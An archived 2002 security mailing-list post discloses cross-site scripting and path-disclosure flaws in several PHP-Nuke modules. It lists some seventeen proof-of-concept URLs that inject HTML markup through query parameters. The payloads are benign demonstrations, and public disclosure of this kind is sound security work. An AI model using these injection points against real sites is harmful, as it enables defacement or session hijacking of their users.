More Cross site Scripting in PHPNuke

From: Replugge [ROD] (replugge@alcoholico.org)
Date: 04/23/02


From: "Replugge [ROD]" <replugge@alcoholico.org>
To: bugtraq@securityfocus.com, info@securiteam.com, submissions@packetstormsecurity.org
Date: 23 Apr 2002 09:50:48 +0200

Cross site scripting is a serious problem, (even if some people
doesn't believe it), On this second round i'll show 8 new XSS
vulnerabilities in PHP Nuke (most of them are also path disclosure
vulns):

http://nuke/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=%22%3Ch1%3EI%20Love%20XSS%3C/h1%3E
http://nuke/modules.php?name=Classifieds&op=ViewAds&id_catg=%22%3Ch1%3ESmelly%20socks%20category%3C/h1%3E&id_subcatg=75
http://nuke/modules.php?op=modload&name=Guestbook&file=index&entry=%22%3Ch1%3Etest%3C/h1%3E
http://nuke/modules.php?name=Your_Account&op=userinfo&uname=%22%3Ch1%3Etest%20123%3C/h1%3E
http://nuke/modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=Replugge%20Love%20PHPNuke%20
http://nuke/modules.php?name=Stories_Archive&sa=show_month&year=Love%20this&month=3&month_l=Replugge
http://nuke/modules.php?name=Surveys&pollID=%22%3Ch1%3Etest%3C/h1%3E
http://nuke/modules.php?op=modload&name=WebChat&file=index&roomid=%22%3Ch1%3EBugger%20You%3C/h1%3E

That in Addition to the 9 i mentioned last week on my posting to
vuln-dev:

http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=%22%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownload
http://nuke/modules.php?name=Downloads&d_op=viewdownload&%22%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=
http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=anything_here
http://nuke/modules.php?name=Downloads&d_op=brokendownload&lid=%22%3Ch1%3EFREE%20Downloads%20with%20virus%20included!!!%3C/h1%3E
http://nuke/modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=%22%3Ch1%3E%3Cb%3EHax0r!%3C/b%3E%3C/h1%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3ECooooooooooooool!!!!%3C/h1%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=49&ttitle=%22%3Ch1%3EIll%20advertise%20my%20dirty%20underwear%20in%20here%3C/h6%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3E%3Cb%3Eboth%20of%20them?%3C/b%3E%3C/h1%3E&ttitle=%22%3Ch1%3E%3Cb%3Ewhy%20not%20modify%3C/b%3E%3C/h1%3E

I would like to mention that i couldn't find any contact information
on phpnuke's website (without registering as a user).

Best Regards

-- 
/*
Rodrigo Gutierrez                              +47 73546339
rodrigo@trustix.com			       +47 98060198
Trustix AS                           http://www.trustix.com
*/



Relevant Pages

  • RE: [Full-disclosure] RE:DONT SEND ME AGAIN PLS
    ... XSS vulnerabilities in Google.com ... XSS vulnerabilities in Google.com (GroundZero Security) ... It lists the folks that they might ...
    (Full-Disclosure)
  • Re: [Full-disclosure] XSS vulnerabilities in Google.com
    ... XSS will always remain part of the Full-Disclosure list if little ... > are we starting to post vulnerabilities in specific websites now rather than ... when using UTF-7 encoded payloads. ... > The server response lacks charset encoding enforcement, ...
    (Full-Disclosure)
  • [Full-disclosure] XSS vulnerabilities via errors at requests to DB
    ... Let's continue a series of my articles about the most common places of XSS. ... Earlier I wrote already about XSS vulnerabilities at 404 pages ... needed to use not script tag, but body tag to conduct XSS attack, so the ... code will be completely showed in message about error in SQL query. ...
    (Full-Disclosure)
  • Re: [Full-disclosure] XSS vulnerabilities via errors at requests to DB
    ... Let's continue a series of my articles about the most common places of XSS. ... Earlier I wrote already about XSS vulnerabilities at 404 pages ... in messages about errors at requests to databases (XSS via SQL Error). ... needed to use not script tag, but body tag to conduct XSS attack, so the ...
    (Full-Disclosure)
  • Re: [Full-disclosure] XSS Vulnerabilities at Sun, IBM, Verisign, AOL,
    ... Instead of emailing every single site you find an XSS in, can you just send a weekly summary instead so as not to fill ... Why world's leading security companies don't take care of their = ... I`ve published some of XSS vulnerabilities in my blog and forwarded them = ... have vulnerabilities in their web sites. ...
    (Full-Disclosure)